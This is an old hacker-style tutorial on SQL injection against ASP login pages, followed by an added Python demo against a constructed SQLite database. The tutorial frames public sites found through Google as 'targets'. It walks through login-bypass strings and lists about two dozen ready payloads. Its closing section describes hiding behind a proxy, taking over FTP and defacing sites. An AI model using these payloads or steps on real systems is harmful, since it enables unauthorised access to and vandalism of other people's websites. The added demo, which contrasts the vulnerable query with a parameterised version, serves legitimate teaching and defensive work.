- OK, so before we start this tutorial: it is for educational purposes only. I am not responsible for what you do with it, nor will I help you with any legal trouble you face.
- ---------------------------------------------------------------------------------
- SQL INJECTION Tutorial
- This is for people who have a brief or absolutely no idea what SQLi is and have no idea how to find a
- vulnerable target to exploit through simple SQL injection.
- Section 1
- 1- DATABASES
- 2- SQL
- 3- MS SQL
- 4- LOGIN
- Section 2
- 5- LOGIN.ASP /ADMIN/LOGIN.ASP
- 6- CHECKING THE SOURCE
- 7- NUMERIC PARAMETERS
- 8- THE INJECTION
- 9- OTHER QUERY STRINGS
- 10- WHAT TO DO
- 1- DATABASES
- This might look boring to you; if so, skip it, I don't mind. The easiest way to picture a database is as a library:
- a method of storing and retrieving data. A database table is made of two kinds of things: columns, which are referred
- to as 'fields', and rows, which are referred to as 'records'. Take an example:
- Name     D.O.B      User ID
- Annon    14/2/08    001
- Alex     11/7/09    002
- Sofia    12/09/07   003
- This is a simple example. I will not go much further into databases and their workings for now; more information on
- this can be found with Google.
- 2- SQL
- SQL is short for Structured Query Language and is the language used to communicate with a relational database, the
- most commonly used kind of database out there. SQL uses queries to get information from tables within the database.
- There are many commands and clauses in SQL, but we will not be going into them in the BEGINNERS part of the tutorial;
- the ones we will be focusing on are as follows:
- SELECT - This is the basis of the SQL language. It starts every query that follows and names which columns (fields)
- of the matching records you want back.
- FROM - This clause names the table, e.g. 'table1' or 'password'.
- WHERE - This clause lets you specify conditions that the records must meet.
- These are the basics you will be using in this part of the tutorial. Now to put these commands into action.
- 3- MS SQL
- MS SQL is what we will be focusing on in this tutorial. MS SQL is short for Microsoft SQL Server. It is a cheaper
- alternative to other databases such as Oracle, which means there are a lot of targets out there; whether or not they
- are vulnerable is another thing, which we will discuss later in this tutorial. We will learn how to attack it through
- our web browser over HTTP on port 80. In my advanced tutorial we will also look at attacking MS SQL directly over its
- own network port (TCP 1433 by default; UDP 1434 is the SQL Server Browser service, which tells clients which port an
- instance is listening on).
- 4- LOGIN
- This is the basic query behind a login page that uses SQL (note that this is only an example; you will not find this
- in the page source 99% of the time).
- *NOTE* In SQL, * is a wildcard: it is a shortcut meaning all columns. Also note that an empty string is not the same
- as NULL!
- " SELECT * FROM 'tablename' WHERE login='"&log&"' and password='"&pass&"' "
- Let's say that login = Th3_R@V3N and pass = haxxoRe. After the application pastes those values in, the query becomes:
- SELECT * FROM table1 WHERE login='Th3_R@V3N' and password='haxxoRe'
- The database returns a row only if both values match. Here it found a record in 'table1' for the login Th3_R@V3N
- whose password was haxxoRe, thus our login would be successful.
- 5- LOGIN.ASP /ADMIN/LOGIN.ASP
- Classic ASP pages (the .asp extension) are very commonly backed by MS SQL or Access, and their login pages are often
- named login.asp or admin/login.asp. Searching Google for such pages turns up a hell of a lot of targets; however, not
- all of them are vulnerable. When you find one, open it: you should see a Username field and a Password field (in most
- cases). Congratulations, you are now 1337. Not really, but you have taken the first and easiest step.
- 6- Checking the Source
- You should all know how to look at the source of a page; if not, right click in your browser and go to View Source.
- Remember that ASP runs on the server, so View Source normally shows only the HTML it produced, not the script behind
- it; the script below is the kind of server-side code that typically sits behind such a form. A typical example of
- what a webmaster would write:
- Code:
- <%@ Language="VBScript" %>
- <%
- Dim conn, rs, log, pwd
- ' The two form values are taken exactly as the user typed them...
- log = Request.Form("login_name")
- pwd = Request.Form("pass")
- Set conn = Server.CreateObject("ADODB.Connection")
- conn.ConnectionString = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=c:\database\tab1.mdb"
- conn.Open
- Set rs = Server.CreateObject("ADODB.Recordset")
- ' ...and concatenated straight into the query text. This is the injection point.
- rs.Open "SELECT * FROM table1 WHERE login='" & log & "' AND password='" & pwd & "'", conn
- ' Only "did any row come back?" is checked, not which row.
- If rs.EOF Then
-     Response.Write("Login failed")
- Else
-     Response.Write("Login successful")
- End If
- %>
- This is very basic code, but it gives you an insight into the kind of code to look out for: the two form values go
- straight into the query text, with nothing between the user and the SQL. Note that this particular connection string
- opens an Access .mdb file through the Jet OLE DB provider rather than SQL Server; the flaw is the same either way.
- Also check anything between <FORM> and </FORM>: this tells you the method of the request (GET or POST) and the field
- names, and sometimes reveals hidden values as well.
- 7- NUMERIC PARAMETERS
- I will not go too much into this, as it is just a beginner's guide. However, it is important to know what numeric
- parameters are. There are normally three different types of fields:
- String
- Date
- Number
- The column type determines how the value is written into the query. For example, LEET is obviously a string, whereas
- 1337 could be a number, though it could also be stored as a string. The difference is that strings and dates have
- quotes around them in the query, whereas numbers do not.
- EXAMPLE
- SELECT * FROM table1 WHERE name='LEET'
- SELECT * FROM table1 WHERE id=7
- This should be remembered when doing advanced SQL injection with the UNION clause. It should also be remembered that
- an injection into a string parameter first has to break out of the quotes, whereas a numeric parameter can simply be
- followed by more SQL (for example id=7 or 1=1); that will be covered later.
- 8- THE INJECTION
- OK, I know the stuff above has been boring. But now we get to the good stuff: the actual injection.
- An SQL injection is injecting specially crafted input into the username and/or password field using characters that
- mean something to SQL (the single quote, the comment marker --, and so on). If the developer has not escaped or,
- better, parameterised these inputs, the input becomes part of the query, and the login can be fooled into thinking
- you have the correct password when you do not. Take the example:
- ' or 1=1--
- This may look simple, but how can attackers use it to get access? Let us take the previous example.
- " SELECT * FROM 'tablename' WHERE login='"&log&"' and password='"&pass&"' "
- Now let us say that the user Magic is an admin on the site and you wish to get access to his account. You would use
- one of the following injections (two different strings, to show two different ways access is granted):
- User: Magic
- Password: ' or 1=1--
- Password: hi' or 'a'='a
- If the developer was lazy, you will get access to the site. Why? Let us substitute!
- SELECT * FROM table4 WHERE login='Magic' and password='hi' or 'a'='a'
- *NOTE* the application itself adds the closing ' after the password field, which is why the injected string is
- hi' or 'a'='a and not hi' or 'a'='a': the last quote is supplied by the query template, and a spare one would break
- the syntax. There is a difference =)
- In this example the password is obviously not 'hi', but 'a' does equal 'a', so the condition is met =D. Note that AND
- binds more tightly than OR, so the condition is really (login='Magic' and password='hi') or 'a'='a', which is true for
- every row in the table: the login check passes, but if the application uses the first row returned, that row is not
- necessarily Magic's. To land in a specific account, put the injection in the username instead: Magic'-- gives
- login='Magic' and comments out the password check entirely (this is what admin'-- in the list below does).
- SELECT * FROM table4 WHERE login='Magic' and password='' or 1=1-- '
- It is important to note that -- starts a comment, so the database ignores the rest of the line.
- In this example the password does not equal the empty string (''), but 1 does equal 1, and because -- commented out
- the trailing ' that the application appended, we do not need to worry about balancing that quote. (The variant
- ' or a=a-- that appears in many payload lists only works if the table happens to have a column named a: without
- quotes, a is a column name, not a string.)
- 9- OTHER QUERY STRINGS
- Here is a publicly circulated list of query strings. Note that not all of them will work against a given page: the
- right one depends on how the original query is quoted and bracketed (single or double quotes, parentheses) and on
- whether the database accepts -- or # as a comment marker, so you may have to try a few before you get one that works,
- or similarly you could make up your own.
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- hi' or 'a'='a
- hi') or ('a'='a
- hi") or ("a"="a
- admin'--
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
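- The following is an added example and is not part of the original tutorial. It rebuilds the login query from sections 4 and 8 in Python against an in-memory SQLite database (the standard-library sqlite3 module stands in for ASP with Jet or MS SQL, and the users table, passwords and the admin account "Magic" are constructed for the demo), runs several of the strings from the list above against it, shows the unquoted numeric case from section 7, and puts the parameterised, hardened version beside the vulnerable one. Comment syntax and error messages are SQLite's; MS SQL also accepts -- but words its errors differently.

```python
import sqlite3

# Constructed sample data (not from the tutorial): three users, one of them the admin "Magic".
SAMPLE_USERS = [
    (1, "Annon", "s3cret"),
    (2, "Magic", "haxxoRe"),
    (3, "Sofia", "letmein"),
]


def make_db():
    """Return an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, log, pwd):
    """The tutorial's login.asp pattern: form values are concatenated into the SQL text.

    Like the ASP page it only cares whether any row came back; it returns the login of
    the first matching row (or None) so we can see *which* account the site would open.
    """
    sql = ("SELECT login FROM users WHERE login='" + log +
           "' AND password='" + pwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, log, pwd):
    """Same check with bound parameters: the values travel separately from the SQL text,
    so quotes and comment markers inside them can never change the query's structure.
    (A real system would also compare password hashes rather than plaintext.)"""
    row = conn.execute("SELECT login FROM users WHERE login=? AND password=?",
                       (log, pwd)).fetchone()
    return row[0] if row else None


def user_by_id_vulnerable(conn, user_id):
    """Numeric parameter (section 7): the query puts no quotes around the value, so injected
    SQL follows the number directly and no quote is needed to break out."""
    sql = "SELECT login FROM users WHERE id=" + user_id
    return [r[0] for r in conn.execute(sql).fetchall()]


def try_payload(conn, log, pwd):
    """Run one candidate string against the vulnerable login and report what happened:
    the account it opened, None for a failed login, or the database error it caused."""
    try:
        return login_vulnerable(conn, log, pwd)
    except sqlite3.OperationalError as exc:
        return "ERROR: " + str(exc)


if __name__ == "__main__":
    db = make_db()
    print("honest login:        ", try_payload(db, "Magic", "haxxoRe"))
    # Section 8: both strings make the WHERE clause true for every row. AND binds tighter
    # than OR, so the first row returned is the first row of the table, not Magic's.
    print("hi' or 'a'='a:       ", try_payload(db, "Magic", "hi' or 'a'='a"))
    print("' or 1=1--:          ", try_payload(db, "Magic", "' or 1=1--"))
    # Injecting in the username and commenting out the rest lands in a chosen account.
    print("Magic'-- as user:    ", try_payload(db, "Magic'--", "anything"))
    # Section 9: list entries that do not match this query's quoting just break the query,
    # and the unquoted a=a refers to a column named a, which this table does not have.
    print("hi') or ('a'='a:     ", try_payload(db, "Magic", "hi') or ('a'='a"))
    print("' or a=a--:          ", try_payload(db, "Magic", "' or a=a--"))
    # Section 7: numeric parameter, no quote needed to break out.
    print("id=2 or 1=1:         ", user_by_id_vulnerable(db, "2 or 1=1"))
    # The parameterised version treats the very same strings as plain data.
    print("safe, injected:      ", login_safe(db, "Magic", "hi' or 'a'='a"))
    print("safe, real password: ", login_safe(db, "Magic", "haxxoRe"))
```

- Run it with python3. The lines worth staring at are the two that log in as Annon rather than Magic (the OR makes every row match and the site takes the first one), the Magic'-- line that does land in the chosen account, the two list entries that produce a database error instead of a login, and the parameterised function returning None for every injected string while still accepting the real password.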
- 10- WHAT TO DO
- There are many things an attacker will do once inside. Most likely they will wreck the site, and most likely they will
- be doing it through a proxy (wink). They could then get into the FTP using the recovered name and password and deface
- the site through the index.html file, and they would more than likely keep a backup to save themselves from some
- serious jail time.
- ---------------------------------------------------------------------
- Enjoy